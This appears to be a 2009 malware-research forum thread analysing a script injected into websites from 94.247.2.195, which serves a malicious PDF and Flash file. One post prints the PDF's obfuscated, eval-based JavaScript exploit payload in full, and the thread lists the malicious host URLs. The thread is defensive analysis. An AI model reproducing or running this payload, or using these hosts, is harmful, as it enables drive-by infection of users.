Malware Domain List
Malware Related => Malicious Domains => Zlkon.lv => Topic started by: sowhat-x on April 07, 2009, 04:31:11 am
-
Ok now,that's a pretty "funky" one...
It's being injected in misconfigured sites out there during last week - you can easily find few example complaints via google:
http://www.google.com/search?q=94.247.2.195%2Fjquery.js (http://www.google.com/search?q=94.247.2.195%2Fjquery.js)
hxxp://94.247.2.195/jquery.js
--->
hxxp://94.247.2.195/news/?id=100
So far it can be trivially decoded thanks to Malzilla, and shows us the following...
hxxp://94.247.2.195/news/?id=2
Which is a pointer to pdf - Result: 0/40 (0.00%):
http://www.virustotal.com/analisis/e85487bf540c8011c2aafd4369109df3
Plus,a pointer to a swf as well - Result: 0/40 (0.00%):
hxxp://94.247.2.195/news/?id=3
http://www.virustotal.com/analisis/b17f0747e571ab126f95bad30bc0ad21
I'm not really able to successfully decode them statically without executing them though,any ideas?
I've got the impression that the .swf is more or less the container of a xor key,
that is being used in order for the pdf's contents to be decoded...
Or i'm i in a completely wrong direction,and i should better go grab myself some extra coffee?... ::)
Password is "infected",as always...
-
I think you could be right :( ..... the following is the uncompressed output from the PDF;
(gt=/,<@:|>-@|@:->;|,;:, |. |><.-|-.;.|;;,@>| ,.|-@<@/g;\(function\(tmx,rts\){zz=\('ff'+'n'+tmx.substr\(0,9612\)+'1'\).substr\(3,9615\).replace\(rts,''\)}\)\('fun,;:, ction>-@ g3\(t\){var;;,@> d><.-=>-@"",c1,;;,@>c2,c3,>-@e><.-=[],j=0,,<@:k=";;,@>eZCd05;;,@>W@:->;gRrA-@<@n1j+S2PcMhB4wfOD@:->;Ey-@<@96tivp>-@=l-.;.HmJzoYNkGX8FLVTqQ3asxUIb. 7/. K-.;.u>-@";do{for\(v ,.ar i=,<@:1;i<5;i+@:->;+\);;,@>e[i ,.]-@<@=k.indexOf\(t>-@.charAt@:->;\(j-@<@++\)\);c,;:, 1=\(e[1 ,.]<<2\)|\(e[@:->;2]>>4\)@:->;;c2=,;:, \(,;:, \(e[>-@2]&15\)<<4\)|\(e[3]@:->;>>2\);c3 ,.=\(. \(e,<@:[3]&-.;.3\)<<6\)|e[4];-.;.d=d+Stri>-@ng.-.;.fr,;:, om@:->;Char@:->;C,;:, o-@<@de\(c1 ,.\);@:->;if\(e[3;;,@>]!. =64\)d=d+St,;:, rin,;:, g.f,;:, rom><.-CharCod>-@e\(c2\) ,.;if@:->;\(e[4@:->;]!=@:->;64\)d=d+><.-Str,;:, ing.fromChar. Co,;:, de\(>-@c3\);-.;.} ,.while\(j<t.length\)><.-;re@:->;t@:->;urn>-@ d;}e@:->;va>-@l\(g3\("9HZHPBvqh3-.;.y794xHy3j. vyWhzRp;;,@>B,<@:Qj ,.d1q1VBQjd1q1 ,.VBQj. d1-@<@q1VB-.;.Q10O52pB@:->;Q1. T1-.;.Q2pBQ ,.j=Od+cBQ+dZ><.-C+c,<@:BQ+d-@<@eF1-.;.c. B;;,@>QPh ,.f;;,@>T ,.1,;:, VBQPM,<@:R-.;.q;;,@>1VBQ-.;.P><.-hr>-@W ,.2cBQP-.;.M-@<@iF><.-jcBQP ,.l. O52V@:->;B@:->;QP,;:, lOWPp ,.B,;:, Q+0RaPpBQP>-@0. f-@<@qP>-@c;;,@>B,;:, Q-@<@PhO5PpBQ@:->;j ,.=P;;,@>5PpBQPMjZPp-.;.BQ+ ,.h-@<@f3jCBQ>-@j ,.drW. 1VBQ+hf3jCBQ. jlB5jVBQP><.-hfF1VBQ;;,@>PhO. 5-@<@2pBQj=P><.-5>-@PpBQ,<@:2=lF1VBQj=0sjVBQPM5Z1c. BQ-.;.1d><.-y,;:, F-@<@1;;,@>VBQPhfL>-@1cB;;,@>Q-.;.P,;:, h><.-O5Pp-@<@B. Q2h03jpBQ,;:, 2=H52pBQjTy@:->;sjVBQj,;:, =-@<@hL1cBQ1d951. cBQP>-@hfLPpBQPhO5Pp>-@BQ2h0@:->;3jpBQ2=H5jVBQ2q-.;.0,;:, sjVB. Q1,<@:M ,.eQPpBQ1dyVPCBQPh. fFPCB>-@QPhO5PpB;;,@>Q ,.2h><.-03jp-.;.BQ;;,@>2=H51V. BQ1. desjVBQ10fV. 1-@<@cBQ1d><.-y-.;.sPp. BQ,<@:PhfT,<@:2pBQ><.-P@:->;hO5P. p;;,@>BQ,<@:2h>-@03j,<@:pBQ2=H. W,;:, Pp><.-BQ1lh><.-sjVBQ1,;:, 0,;:, 0x;;,@>jpB>-@Q1-@<@dy,<@:QjVBQP;;,@>h><.-fV+,<@:c>-@BQP-@<@hO5P ,.pBQ2h03 ,.jpBQ,;:, 2h><.-OW><.-2-.;.p ,.BQP-@<@dy3P>-@pBQ><.-+ ,.h0V2-@<@V-.;.BQj=fL@:->;jcBQP=@:->;9Z2cB@:->;QPMi>-@F,<@:jpBQ. PhO5PcB-@<@Q2=5;;,@>5-.;.PpBQ>-@+h03jpBQj=Pd2pBQPh-@<@rZ>-@2>-@cB. QPhh,;:, sjc><.-BQj=PC><.-jp@:->;BQP=9C2cBQ1d9,;:, C+cBQ@:->;Phf3j,;:, CBQ ,.PhO><.-5 ,.P>-@p-@<@BQ+. d9CPpBQP=. B-@<@0,;:, +cBQ@:->;+-.;.hO@:->;d1CBQjTiFjVB ,.Q>-@PhO5Pp;;,@>B ,.Qj=O,<@:5Pp;;,@>B. Q. P=jZ-.;.2cB-@<@Q1l03jCBQ1-@<@lf32V-.;.B-@<@Qj=OCPpBQ2qOZ-.;.2cBQ1MesjV,<@:B>-@QPhO5PpBQ2lO5,;:, Pp><.-BQ2h03;;,@>j,;:, CBQ+d@:->;BW;;,@>2pBQ2=O5PC@:->;BQ. 2l0><.-3j ,.CBQ1d9WjVB>-@QPhfs;;,@>PcBQPhO,;:, 5Pp@:->;B@:->;Q2h55. 2VBQ><.-1=vdP,;:, p>-@B,<@:Q2-@<@=j>-@5,;:, PpB@:->;Q@:->;2T0x,;:, 1cBQ1=i. s2-@<@cBQPh-.;.rZ-.;.P@:->;p-@<@BQ,;:, + ,.00xjVBQPh,<@:O5P@:->;pB,;:, Q+h0. L>-@1C-.;.B>-@Qj=Pd@:->;PpBQPMj;;,@>Z,<@:2cBQPhhsj. cBQj>-@=PCj ,.p><.-BQ ,.P ,.=9C2cBQ2hfFjVB><.-QPh><.-O5PpBQ+dB5P;;,@>pBQ2=95. +-.;.C,<@:B ,.Q2h552VB,;:, QP0j;;,@>d2pBQ2l,;:, 1TjC ,.BQ><.-1MZC2-.;.VB,;:, Q2>-@q-.;.f-.;.x2 ,.cBQ2lj,;:, C ,.PpBQ2h03j,;:, CB-@<@Q+d-@<@BW1VB@:->;Q2-@<@=O52cBQ2l,<@:03jC. BQ,<@:1d@:->;9>-@WjV,<@:BQ,<@:P. hOd2VBQPh>-@O5PpB. QPh@:->;fsjcBQ+h>-@0><.-L1,<@:CBQj=PdP-.;.pBQ@:->;PM9Z2;;,@>cBQPh2sjcBQ,;:, j@:->;=PCj,<@:pBQP=9C2c,<@:BQPl-@<@fFj-@<@VBQPhO5-@<@PpBQ>-@+dB5. PpB ,.Qj-.;.=2L1CBQP ,.lO,;:, Z2cBQPhh,<@:s;;,@>j-@<@cBQ-@<@j=PCjpBQP=9><.-C2c>-@BQPhfF-@<@jVBQ;;,@>PhO5PpBQ ,.2-.;.hB@:->;5><.-P>-@pBQ2lPC,;:, jC-@<@BQ10B52VBQ><.-10B5-@<@2 ,.VBQ10B52,<@:VBQ10@:->;B52-.;.V-.;.BQ1>-@d1 ,.32VBQ2=B,;:, 5,<@:2pBQj=PC@:->;2VBQ1-.;.02T-.;.jcB>-@Q2 ,.l2><.-L. +CB,<@:Q1,;:, 0. fL1. CBQj@:->;=PC2cBQj=2F1VBQP;;,@>M><.-yx,<@:1>-@pBQ2-.;.=R,<@:3jCBQ2=;;,@>H5>-@1VBQ+h1><.-3jCB,;:, Qj=P. 01VBQ><.-P=-@<@0x2pBQPh1><.-x-@<@jVBQ2=l-.;.L2><.-VBQ+. Ml3jC-@<@B@:->;QPh,<@:jd ,.PpBQP01L2VB,<@:Q2Mf-.;.VjpBQjdrZPcBQ1l@:->;j5,<@:2><.-VB,;:, QP0jC+. cBQ,;:, PMeL+cBQ>-@PlfQ1;;,@>cBQ-@<@1h;;,@>P0;;,@>jcB><.-QPM@:->;yx2pBQ1=0 ,.VP,<@:cBQPhj51pBQ2,;:, h,;:, fL. PC ,.BQ1h@:->;hFjCBQ1M,;:, 5,<@:0,<@:jC ,.B;;,@>Q+h. 5C>-@1@:->;c ,.BQ2=hF2. cBQ1 ,.d23j,;:, C;;,@>BQ. 2=h3. jCB-.;.QPh ,.jd2,;:, pBQ ,.+dlT1pBQ,<@:PM13jCBQ;;,@>j=,;:, PZ;;,@>j>-@CB@:->;QP=jCjcB,;:, Q. 1Tr@:->;52V><.-BQPhR><.-3jCBQPh ,.13j;;,@>C><.-BQ-.;.2=0V,;:, 2cB. Q1lP. C1,<@:pBQPh><.-O5@:->;jVBQ1hRFj. VBQ-.;.1-.;.MeL1-@<@c><.-BQ-@<@2l0><.-L1CBQ-@<@2MjCPC,;:, BQ2MZZ>-@1p><.-BQP,;:, hOZ1cBQjT23+CBQjT,<@:ea;;,@>jCBQ1lfT2-@<@cB><.-Q1,<@:Tl,;:, VP;;,@>pBQ@:->;1lhTjCBQ1 ,.T2T><.-1,;:, pBQ1lhTjVBQ1><.-lhT>-@1pBQ1T;;,@>lT1. cB@:->;Q1-.;.lfTjcBQj><.-=-.;.h3-.;.PcBQjT1. aj;;,@>VBQ,<@:1-.;.q. fVPpB,<@:Qj=><.-23+cB-@<@Q1T0><.-TPC ,.B. Q1= ,.f. T1C ,.R,;:, o+VZ><.-3fw>-@Rihd,<@:5kyQ,<@:P. 2PaesM;;,@>ce ,.7RWx>-@H9V,;:, Z><.-Z,<@:yJr,<@:v6ci-@<@o+VZ,<@:m94x=9,<@:W-.;.H8EpZ,<@:X6wi3-@<@Ed0z-.;.Ew-@<@9zyq. Gf1>-@Jfk,<@:RW. P ,.P6,<@:WLq9-@<@W><.-rZy-@<@wPa. +45SAc ,.ZI-@<@Rg9zD,;:, 4LHRCvG93vTcQ ,.iV9pxk>-@O4xJ9Wi,;:, Y><.-1=Ll>-@hwv,<@:k><.-9><.-g ,.Pp2w. 5@:->;q9;;,@>T-@<@H-@<@vMV><.-H;;,@>IEw9><.-z>-@yq@:->;Gf1 ,.JfiATqiEw9 ,.zy;;,@>qGf1JfItcZG9><.-3vTcQiV-.;.9pe7RWQa-@<@D ,.gjn4dr3n;;,@>Jj ,.Qf,;:, J-@<@jqymH;;,@>XOViFnW,;:, PP6,;:, WL,<@:q9WrZywPa+45@:->;SnTRo@:->;+VZVOw;;,@>PQy,<@:msiEw9zyq. Gf1JfIRgqiOJBX-.;.fa><.-P-@<@oE3sicHBL4l. 5,<@:+PHlz901,<@:QfB5C2J>-@0o-@<@Rgk,;:, i9m5VRWb>-@q. fm,;:, BUPhoR9hfiSce@:->;F6d,<@:Z=1W1>-@Ff>-@TZ=@:->;+VZ3fwRihW9>-@Fy0z>-@QDC;;,@>e7R;;,@>dZsjd ,.eF1deF+V. Z3. f. w. R>-@i@:->;M-.;.wvzyTHa>-@4@:->;JB1+5;;,@>OW4Mf-.;.iSc,;:, Zq>-@2TBvh,;:, hrCycxkO4x,;:, J. 9Wi@:->;iApeV+. VZ3f,<@:wRiO55sEg;;,@>P@:->;qf,;:, l><.-5-@<@L9gyxfhbiScZ><.-2O>-@a@:->;Z-.;.Fc ,.= ,.BzR><.-C,<@:q><.-i,;:, A-@<@0Q@:->;s. Dg1x9,<@:Q. oQMdv4PHl>-@3A-.;.TZs1T@:->;io+. VZ3@:->;fwRiE,;:, w9zyqGf1Jf><.-i ,.ScZQEmBTf35FOcip-.;.r,;:, whx1d ,.lFrw,;:, hx,<@:1dl. FR,;:, pl@:->;IRWQ>-@aDg ,.jn-@<@4dr><.-3R. dqiE>-@J,;:, Hs,;:, jmFLAWQaDg-@<@jn4dr-@<@3><.-nCZl,<@:h-@<@wvk><.-9gPp2,<@:w,;:, 5q9,;:, THvM-.;.VlI,;:, R-.;.gO><.-vypZOP-.;.J9U,;:, DhQg><.-Rdqi-@<@AWbqfm><.-B>-@U. PhoR9hfinceF6 ,.d2><.-F1d. eF1C;;,@>l8-.;.hW9Fy,<@:0 ,.z ,.QDd. k-.;.iOm-.;.7VRCv3f><.-w,<@:Ri;;,@>OQixMlr;;,@>p><.-4=HjM4HqSMeIO>-@QixMlrp>-@4,;:, =H@:->;j,;:, M4HqS5,<@:H. W9@:->;aooM,;:, hyI-@<@OQixMlr. p4=H-.;.jM4HqA. Vk ,.oRgk ,.i@:->;hd5kyQ ,.P2PaesMBGJ4d. H+2mrD+,<@:hQjDw@:->;P9R><.-dqi-@<@E,;:, w ,.9z-.;.yqGf1JfiAVZ;;,@>q ,.2,<@:TBvhhr,<@:Cy>-@M;;,@>kitcZ7RWOQEm@:->;j-.;.qD4-.;.7X,<@:R07+1g2V,;:, Ag-@<@H>-@RB5isAc>-@Z><.-IRgO><.-vypZ06=j-.;.4BJo3RdqifwZFnJ>-@OoOw>-@9 ,.HyH. O,;:, HyJjoE3,<@:sX9,;:, W7M9,<@:gr,<@:oEmyzAM,<@:kiPgzTBH-@<@O@:->;U>-@9,;:, pe7R0P>-@U1 ,.QO4><.-6Jf><.-XymBF>-@EW5=Oci8w0>-@28OV. FpRplI-@<@RgOvypZGfM5+E>-@d0Fh-.;.Q-.;.ZxOVe,;:, 7RWxH9VZZyJ ,.r>-@v6cv@:->;0. 6=,<@:j4BJo3n-@<@mj-@<@zfwrZ9C,<@:iFAc ,.L;;,@>06=j4BJo-.;.3nmjzfwrZ. 9@:->;C ,.iLAcL06=j4BJo3nm><.-j>-@z;;,@>fwrZ9C,;:, iV><.-Ac-@<@lIRWHmRCi,<@:zE40LMmF;;,@>L1,<@:5j>-@26><.-4-.;.9E15qiS;;,@>M,;:, qi ,.+,;:, C@:->;e. mrpe;;,@>zAWQv1,;:, h><.-xk1MZ;;,@>M>-@hgHJ-@<@4,;:, T59R,;:, dq-.;.7Rd0irpfiE@:->;40,;:, L;;,@>M;;,@>mF,;:, L15j264-@<@9E1-@<@HqiSCeV-.;.A><.-cZbtCZ. Gf,;:, M5;;,@>+Ed-.;.0FhQZxOQkLwcebRd0 ,.oA-@<@cZbtCez,<@:E40LMm-@<@FL1-.;.5j264-.;.9E><.-1-.;.5qi><.-SM,;:, qijVe-.;.m>-@rpZ. Gf. M5-@<@+Ed0;;,@>FhQ@:->;Zx;;,@>OQ-@<@kLw. c@:->;e,<@:bRd0o,<@:RgLb><.-RCvGfM5+-.;.Ed0Fh-.;.QZx@:->;OQkF ,.wcebR;;,@>dyo ,.AcZIR0o,;:, ByBoZM ,.lO-@<@OA@:->;gH,<@:RB5i;;,@>sAMki. 9m-.;.5VR0Ozh;;,@>qP-@<@Z9w. Zj6,<@:JZp ,.Rd@:->;q,;:, i94,<@:xHy-@<@3. j-.;.vy><.-Wh. zRpBQ,<@:1W1FfV ,.BQ-.;.1;;,@>W1F-.;.fVR,<@:o+V,<@:Za@:->;DWHk ,.OcvWD5@:->;j02-@<@wBFM-.;.w-.;.oFf. px. kO><.-4. x,<@:J9Wi-.;.iSC,;:, eqjd ,.lQ,;:, 1pliPmvMP05,;:, Q;;,@>y0>-@QUyWRiA,<@:T@:->;qi><.-PmvMP ,.0 ,.5Qy0@:->;QUyWRIRg,;:, PzDw-.;.1Xf37-@<@kEW5,<@:p ,.haP8ymh ,.iS-@<@cZ,<@:dE3Lkf4;;,@>RXf37kEW. B=90BGf ,.4-.;.Hkc4xmEV@:->;vI,<@:yaBpD-.;.=zi>-@RpRkEwjJ+pZW,<@:D5j02wBF,;:, M-.;.woFf;;,@>Jq@:->;o;;,@>+VZV><.-OwP><.-Qy,;:, msi1dki>-@t;;,@>wrH,<@:9g;;,@>BVEp><.-eL-@<@+. V. Z7RWHmA0-@<@7+,<@:1 ,.g2VAgO2OhBf95jJ,;:, AcHIRgO-.;.v,<@:ypZzD-.;.BiqP ,.wvz>-@y>-@H,<@:y79 ,.4xH,<@:y3 ,.jvyW><.-hzRpBQ100@:->;F2cB><.-Q><.-100F2cRo,;:, +aOvypZXEMqV1>-@dG,;:, 3;;,@>fwRiOm>-@y7-@<@EmqN9. HZHPBvq;;,@>h@:->;3yXEWBXO,;:, aPz+VZa,<@:DWHk-@<@OcvzD><.-B><.-iqPwv,<@:zyHyXE-.;.WBXOa ,.PzSW,;:, OJ;;,@>A4vo4;;,@>dP56Wv-.;.VBV-.;.k;;,@>7DWH-@<@f,<@:j0BsDgrw;;,@>+-.;.aOv>-@yp-@<@ZXE-@<@4 ,.rVS4,<@:vo4,;:, dP56WvVBV,<@:xT ,.94rT-@<@9 ,.g. r-.;.oEm;;,@>yz1CL ,.mOV,;:, lIRgOvyp;;,@>ZT9WHJS4vo-@<@4dP56WvVBV ,.x><.-T@:->;94rT9groEmyz1CLz><.-D;;,@>Bi ,.qPwvzy><.-H-.;.yXE;;,@>W ,.B-@<@XOaPzn4OJAM>-@ki93v>-@oEWhz>-@yaPoOVxkO4,;:, xJ. 9Wi@:->;NOmyb1g-.;.i31d. eF1-@<@C,<@:HT><.-9W@:->;HJS. wj. qD4yNya>-@PoO,;:, V><.-G-.;.XE-@<@4rV-.;.+VZ3fwR-.;.ifwrV><.-EMQXOwyi2wr,;:, V@:->;fwlzAMGmE-.;.a. RzD,<@:w;;,@>z71dGo6;;,@>=FL1=eF><.-+><.-3><.-HU><.-AVko6-@<@35@:->;VymQEDw-.;.o9;;,@>S. w><.-jqD-.;.4yN9HZHPBvq>-@h-@<@397Rg-.;.OvypZ+hh5kPq ,.vaPT@:->;q><.-p1MRxRpkp+Ml. x+ ,.Mlx+@:->;Ml@:->;p;;,@>A;;,@>VRx+Mlx+cRN-@<@R-.;.=><.-lx+MlpAVRs+dis,<@:+d,<@:isRpkp-@<@+dis+d ,.is><.-+dis@:->;+d;;,@>is+>-@di@:->;s+dis><.-+di ,.s ,.+dis+d,<@:is>-@+di>-@s>-@Rpkp+dis+ ,.d,<@:is@:->;+d-@<@is+dis+dis+dis+dis+dis+d@:->;is+dis ,.+,;:, di@:->;s+. dis. +dis+d-@<@is+><.-d;;,@>is+dis+di-@<@s+d>-@is+dis+dis-@<@+dis+d-.;.is+-.;.dis+;;,@>dis+dis+,;:, d@:->;is+d><.-is+d. is+-.;.di@:->;s+dis+di. s+d-.;.is+,<@:dis;;,@>+dis+dis-.;.+><.-di-.;.s+di,;:, s+dis><.-+. dipAVRs+di><.-s+d. is+d,<@:is@:->;+d-.;.is+><.-d><.-i,;:, s+dis+dis+d><.-i ,.s+di><.-s+di. s+dis+dis+d><.-i;;,@>s+di-.;.pA;;,@>VRs+>-@d-.;.is+;;,@>dis>-@+dis-.;.+dis+dis+d><.-is+di@:->;s+d>-@is+. dis;;,@>+dis@:->;+di-@<@s+CR,;:, N,<@:R>-@=is+di,;:, s+di;;,@>s+dis+dipAVR,<@:s+dis+dis+dis+dis+dis+;;,@>disRpk-.;.p+-.;.di@:->;s,;:, +d><.-is+dis+d;;,@>is+di,;:, p-@<@+VZ,;:, Q,<@:9,;:, W><.-HknJZ;;,@>VD-.;.4-.;.xqOpiprM2Q1d ,.eFO ,.pRkMH5,;:, ZE09R@:->;9,;:, q-.;.yo+aqu"\)\);',gt\);eval\(\('ac'+'d'+zz+'cd'+'m'\).substr\(3,zz.length\)\);)
-
Wepawet does the job.
http://wepawet.cs.ucsb.edu/view.php?hash=c3268e4f6babb9f7b0c1c9dc0d75937e&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=2471c74881c594faf9a2a711117bd250&type=js
-
Nice one :)
-
The .js is easy,thanks for the pdf - but for the swf file though?
That's what puzzled me the most...Flasm ain't really got support for flash9,so it couldn't decompile it.
Then i've also tested 2 commercial flash decompilers/disassemblers,and both of them kept crashing,he-he,i wonder why... ;D
The closer i could get about disassembling it,was via abcdump here:
http://iteratif.free.fr/blog/index.php?2006/11/15/61-un-premier-decompileur-as3
-
Here's abcdump's output,for the sake of easiness...
-
I have already listed it last week. As far as I remember CkreM had reported it by PM.
http://www.malwaredomainlist.com/mdl.php?search=94.247.2.195&colsearch=All&quantity=50
http://wepawet.cs.ucsb.edu/view.php?hash=8ab5ba43d0bae3147df34833157a1fbf&t=1238716023&type=js
-
The xorkey there has a totally different usage than what i had thought originally above...and here's the idea/concept behind it,more or less:
http://blog.dannypatterson.com/?p=135
And now,go check out this paper as well...guys,it's not really good news - but i think we're getting a bit closer regarding how this crap works:
http://www.aladdin.com/pdf/airc/airc-report-jan-09.pdf
-
By the way,the domain mentioned in the paper is in the list from back in early January...hardmoviesporno.com namely.
So,now i guess we know where to start in order to decrypt this kind of crap as well,but it's pretty cumbersome doing so by hand,pfff.... :(
One more note...in case anyone wants/needs an updated actionscript disassembler with gui as well:
http://www.docsultant.com/nemo440/
-
Nice one :)
-
sowhat-x:
Hi,
sorry but didn't spot your message earlier. The system failed to notify me.
I'm on-call the whole easter so I'm pretty busy but I'll deifnitely take a closer
look when i have time. I can say though that the flash contains another flash
that is in xorred mode. I haven't had a chance yet to decrypt it but I'll have a
whack at it asap. I'll post you an update when I have something.